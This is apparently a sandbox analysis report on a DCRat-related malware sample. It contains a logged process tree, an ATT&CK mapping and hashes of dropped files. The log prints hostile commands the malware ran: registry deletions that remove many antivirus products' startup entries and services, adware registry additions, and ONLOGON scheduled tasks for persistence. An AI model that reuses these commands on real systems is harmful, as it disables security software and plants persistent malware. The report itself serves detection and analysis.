Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
6⤵
PID:984

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "C:\Windows\system32\rlls.dll" /f /reg:32
6⤵
PID:2212

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "C:\Windows\system32\rlls64.dll" /f /reg:32
6⤵
PID:2224

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
6⤵
PID:2232

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlls.dll" /f /reg:32
6⤵
PID:2240

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlservice.exe" /f /reg:32
6⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
6⤵
PID:2256

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
6⤵
PID:2264

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
6⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
6⤵
PID:596

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
6⤵
PID:2280

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
6⤵
PID:2332

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "C:\Program Files (x86)\RelevantKnowledge" /f /reg:32
6⤵
PID:2320

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
6⤵
PID:2344

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
6⤵
PID:2388

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
6⤵
PID:2396

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
6⤵
PID:2372

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
6⤵
PID:2404

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
6⤵
PID:2420

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
6⤵
PID:2428

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
6⤵
PID:2436

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
6⤵
PID:2444

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
6⤵
PID:2452

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
6⤵
PID:2460

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
6⤵
PID:2468

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
6⤵
PID:2476

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
6⤵
PID:2484

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
6⤵
PID:2492

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
6⤵
PID:2500

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
6⤵
PID:2508

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
6⤵
PID:2516

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
6⤵
PID:2524

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
6⤵
PID:2532

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
6⤵
PID:2540

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
6⤵
PID:2548

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
6⤵
PID:2556

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
6⤵
PID:2564

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
6⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
6⤵
PID:2292

C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe"
4⤵
- Executes dropped EXE
PID:1488

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\savesdll\o23Lz8gEf67oDI4fnROiDtjkjP3rY3.vbe"
5⤵
PID:856

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\savesdll\yJ6RfJ66NGEGI2MLhsk3DOjbzTL4AP.bat" "
6⤵
- Loads dropped DLL
PID:1640

C:\savesdll\H6tchIl3Mk5re1vJkxJB.exe
H6tchIl3Mk5re1vJkxJB.exe -p17d2b7f89e71f3d3b2f00af7ff853ad45cbbac9d
7⤵
- Executes dropped EXE
PID:1968

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\savesdll\pdRmGrBBib01WWxpMtsEP4j1DJCMAO.vbe"
8⤵
PID:1276

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\savesdll\lDVZCGY84K9R24Wa2h27nnSUIYjiBW.bat" "
9⤵
- Loads dropped DLL
PID:2304

C:\savesdll\brokersaves.exe
"C:\savesdll\brokersaves.exe"
10⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "brokersaves" /sc ONLOGON /tr "'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\brokersaves.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:2108

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\conhost.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:2144

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\savesdll\WmiPrvSE.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:2192

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Documents and Settings\WMIADAP.exe'" /rl HIGHEST /f
11⤵
- Creates scheduled task(s)
PID:2236

C:\Documents and Settings\WMIADAP.exe
"C:\Documents and Settings\WMIADAP.exe"
11⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Credential Access

Discovery

Security Software Discovery

T1063

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Desktop.exe
Filesize
1.0MB

MD5
fba94091b40ab37ea868ebe642403cdd

SHA1
71ddf0570b9c2f998c926881f1cd2618bed438be

SHA256
c893013fd9a312e84edfe5afeff1d53ccbfb1ab17c8680728dca7f673bf97cd8

SHA512
cb408b6381513a250896c328e144ffa5713615ae471921e7cb8cc17efbe598e171184679bb4072133ab06b684329a5e0eaaa40ee50815c3739324a78817d8527

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\ANTIAV~1.DAT
Filesize
1.9MB

MD5
0a90c49f2fe85f3b3518c49a625016b3

SHA1
5516598982e7df5825871fe6975b64dc3b2c9f01

SHA256
4692e219e4084a884eaec49d550e15df7f06a9f219eeff3ae934cbd0a7d94fd8

SHA512
f7b6ddec43e2a3e560f09039f25d19753530b5ec83f4c3294c635112defadd7c78024c45d466d78a1d07f7c2c22c9fcbf898a20cdd4ae46f35853d142eddf063

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\Desktop.exe
Filesize
1.0MB

MD5
fba94091b40ab37ea868ebe642403cdd

SHA1
71ddf0570b9c2f998c926881f1cd2618bed438be

SHA256
c893013fd9a312e84edfe5afeff1d53ccbfb1ab17c8680728dca7f673bf97cd8

SHA512
cb408b6381513a250896c328e144ffa5713615ae471921e7cb8cc17efbe598e171184679bb4072133ab06b684329a5e0eaaa40ee50815c3739324a78817d8527

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_1.zip
Filesize
791KB

MD5
3cba3884d76d34dcb5c099336f0cfd91

SHA1
cda38db73239694b48ce89d0ff23fd7fcf9fbaf5

SHA256
72f37b890f903c039a6b7511ec53924f9eb13b9f335c5a746723e4f032d94c0c

SHA512
b57b0cb10ca7c0ad2f773a01cb375942540036c0c1def0579988a6a0b54d4a9b89f854e3799210a1cd684efd333c064a73bde8cc6d5b2ad6aadd478f360ffb77

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_2.zip
Filesize
791KB

MD5
ee0ebd9d1aebc724bb37114e54a05c1f

SHA1
c7aae2cf5c972d1b74719969e37e313e5f6a01b1

SHA256
8383d5eda3a1cef676b70ef8ace8faf0c433666ee457b38d3523a7bc8c41ee04

SHA512
23981c17244d4a17aadcbba807f2bb9b3c050be4dbaea8ac131c902a1f469cdf4d8fd1e01816de179e69bc71f7b4b1e8caf833080bbfab3259fc75d32b557ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_3.zip
Filesize
791KB

MD5
6784a9cd6ecedd1613df1f0c5b97ee4b

SHA1
86e7bb59395c631340bd0e395e887f22cb2ce09c

SHA256
2695ac50c08d4236027ff0712477f2def9a06cee048d511bebec29424133f72b

SHA512
2bc3e60384c8d33f4e8dc113f68d848058fd14c1ad8fe63cc260caf4758b882fb0de6d1f849ea27edb94bc2c12a060bd3ea2840b9d04178b657dd88b1bdc833d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_4.zip
Filesize
791KB

MD5
fb9f071ef31c1d969079a9f6af71eb7a

SHA1
7f1d5b07be199d8e3b72563bd8e62734c28199d8

SHA256
0c42c46c4529b8645afd25e40201822d1ef0030c8df2ed0a675b3660a6682155

SHA512
908119ccaab46ada4c51cd8beadef25f4ad00756eb97cc0f8f808bf693429b85e4602fcad3e9beb0758f5dc42e2fddad56f5f5ec4ed7113d565a4983346b6eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\extracted\file_5.zip
Filesize
2.2MB

MD5
0033c62722f3495c210da055f7778dda

SHA1
c091c9610c822d109b992f01d7aa3e92ef5e2e2b

SHA256
be087d3597feb8e6b4b1473a4bfe781a02dab2ca5bd70e3de9f633fda966eec2

SHA512
7753a4c14c5b16aeab84a4e8f8e3a138b3d507a2e94612bb808460e5d44f6c08e7d9981aa935bc1e1cb6cf5a87f114175ba0d80e550c1e1ca0dfcfead33454df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.bin
Filesize
2.2MB

MD5
f99579a1f87b04503a749800c866dd6a

SHA1
7dfca154f7ef9b0516a446e43a950a462ddc8fba

SHA256
75005bfc6ba3b4472945adc5a12be1975c49ecd364c519cd78d6efa0a30301fe

SHA512
687626a621d0f3f8aa932adb13e6d93fd841510f73009ff4c917f1224d469600cac06468415bf76a45661c263ab90f1b7ed78e89a7747a1bb4f65fff8831d9ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.bat
Filesize
484B

MD5
e8aa101e7c64b2d2395b7ec7a82d97de

SHA1
5c4b751cb1616aed04bd6713fe575a68cd20f986

SHA256
4db448daf849172241b79e4078363dff7befb0aa8d45be9f3343c42e14e1a1ac

SHA512
1cc81b84af8b9db3b31bd788eabb255afa19255580acfac659b137f127319cf53129d73c5838b8790e16bd70ca9f23ca51b4e9e8e66541898ce163395f0a0a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe
Filesize
58KB

MD5
b7352a9cde99367d4053d0de7431a181

SHA1
32d2046f588a98c1ea0fee63d1c275b34497ddea

SHA256
9dd0d5b5b5efe2433cfcbc3044d0219ffeb517c2cde4e705e52719ed15660a00

SHA512
8b6cee0cdd86c616e6a5e65bb08ad9df2926b5fa16b7186166e6fb69ca8eb3f1cef98f3e03ab2ae43c082b6acae82edd0a45d71df14b504ae7bf82da049796df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe
Filesize
58KB

MD5
b7352a9cde99367d4053d0de7431a181

SHA1
32d2046f588a98c1ea0fee63d1c275b34497ddea

SHA256
9dd0d5b5b5efe2433cfcbc3044d0219ffeb517c2cde4e705e52719ed15660a00

SHA512
8b6cee0cdd86c616e6a5e65bb08ad9df2926b5fa16b7186166e6fb69ca8eb3f1cef98f3e03ab2ae43c082b6acae82edd0a45d71df14b504ae7bf82da049796df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe
Filesize
626KB

MD5
e6b35b7105d4075e8b1eeb1e1f9207f4

SHA1
320fa7248cbc68493ea90eb08811c528ab143d24

SHA256
560d7540c620870d38a75633c99026c89ab15a142e59d77b195e2ea0fede31af

SHA512
5568b8686c2048ceadf7545736574528c7f65861e0d05886902d24d0988c8cc4f1d436b0839e78c94798f855c601f83898a36dd615c927a68be41610c93ae07d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\DCRatBuild.exe
Filesize
626KB

MD5
e6b35b7105d4075e8b1eeb1e1f9207f4

SHA1
320fa7248cbc68493ea90eb08811c528ab143d24

SHA256
560d7540c620870d38a75633c99026c89ab15a142e59d77b195e2ea0fede31af

SHA512
5568b8686c2048ceadf7545736574528c7f65861e0d05886902d24d0988c8cc4f1d436b0839e78c94798f855c601f83898a36dd615c927a68be41610c93ae07d

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe
Filesize
7KB

MD5
463dba63615255f9e2f40e4323028f1d

SHA1
2cc71a0d934dfbd409349db59dc51d4b12bca3ca

SHA256
4eaf8bad5d130db8b39d8a1561f08ec457c4ff771eeda460a26cd432f42e8cfd

SHA512
1cd57f19c8f81eee36f647e4557a465075220b89b5fc46ef7992189c85f040fbfee7e62da9d896f618e176340423a634a9ac5b2085edfab1907672f65bcc7100

Download Submit
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe
Filesize
7KB

MD5
463dba63615255f9e2f40e4323028f1d

SHA1
2cc71a0d934dfbd409349db59dc51d4b12bca3ca

SHA256
4eaf8bad5d130db8b39d8a1561f08ec457c4ff771eeda460a26cd432f42e8cfd

SHA512
1cd57f19c8f81eee36f647e4557a465075220b89b5fc46ef7992189c85f040fbfee7e62da9d896f618e176340423a634a9ac5b2085edfab1907672f65bcc7100

Download Submit
C:\Users\Admin\AppData\Roaming\1337\antiav.bat
Filesize
13KB

MD5
96e10d048d34ae83c462c3cc71c21314

SHA1
dc494c62fb67efcc318e54ca9ef15ea87ad24286

SHA256
c2686ead4dec80bdadd8c19e3128b70cf2512b1d016a80d4abea7109adf989e3

SHA512
f58ab0e108314f45c8b8b889a1958faf9b666de46f2c216b6f3737bb93c459e480d6a92184545a3bd9ab4104f955ef9d4fa9da3823d8b30191fa6770e126e4c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
769e4641dcb9b0c4915cec35f89cb8bc

SHA1
1f82d814ed06a3383480a71286e1387360f86c43

SHA256
e8dd80afe84d2b736b7edc659e357109cb50d33ca82bbf1c260db37e4acf5306

SHA512
f08b9686cc6930545fb26f7e538722f33958a1535a5fee57acab9d1f52880c7b15ccfafc807377251fdbb8102f199ec60fc45e7e75cadb42314c49cfc2803a99

Download Submit
C:\savesdll\H6tchIl3Mk5re1vJkxJB.exe
Filesize
463KB

MD5
b8669b7e0efc918720522345fc07c82b

SHA1
6da1d551461249cc6c99b3ae23dacbdd12e12fb7

SHA256
8543e36293585a248c57cd1fdc7bd0b87d0433b4fdc7858f5631e54ff4926e78

SHA512
abd102971b4819c9d6abbeb54718732e475a4b0bca05704e0141521bb6531aab1398c505042572ddff8be949f5b8c1cf546d52f16bca3382e7c2d27ee28f4352

Download Submit
C:\savesdll\H6tchIl3Mk5re1vJkxJB.exe
Filesize
463KB

MD5
b8669b7e0efc918720522345fc07c82b

SHA1
6da1d551461249cc6c99b3ae23dacbdd12e12fb7

SHA256
8543e36293585a248c57cd1fdc7bd0b87d0433b4fdc7858f5631e54ff4926e78

SHA512
abd102971b4819c9d6abbeb54718732e475a4b0bca05704e0141521bb6531aab1398c505042572ddff8be949f5b8c1cf546d52f16bca3382e7c2d27ee28f4352

Download Submit
C:\savesdll\lDVZCGY84K9R24Wa2h27nnSUIYjiBW.bat
Filesize
29B

MD5
2e9d9dbf2481fc85ee6536ad4ec7a1c3

SHA1
8dff9d4f19a72c1634b736a50d42dd74036a138b

SHA256
0203df6ff8f32c3b88f7c6eb4275cf6566b74c9855509c891e483f86361a4822

SHA512
638a801c663a59970693fe4abe51f29129d3a8f9a86fd248e33b15baeaf7ce5732a51ed085d2fcb4518c8b4e8e60e2dd4b6d6a10a985b852eebe0726171bd476

Download Submit
C:\savesdll\o23Lz8gEf67oDI4fnROiDtjkjP3rY3.vbe
Filesize
144B

MD5
c8a0888c17ce7d523cc119f379ef56e9

SHA1
0ef574904c28650df2890cf62dcc012be0e68a43

SHA256
47d9177aea3dc8767df226877f36bf930ee49e86fbcb5787653c88a8708b29f2

SHA512
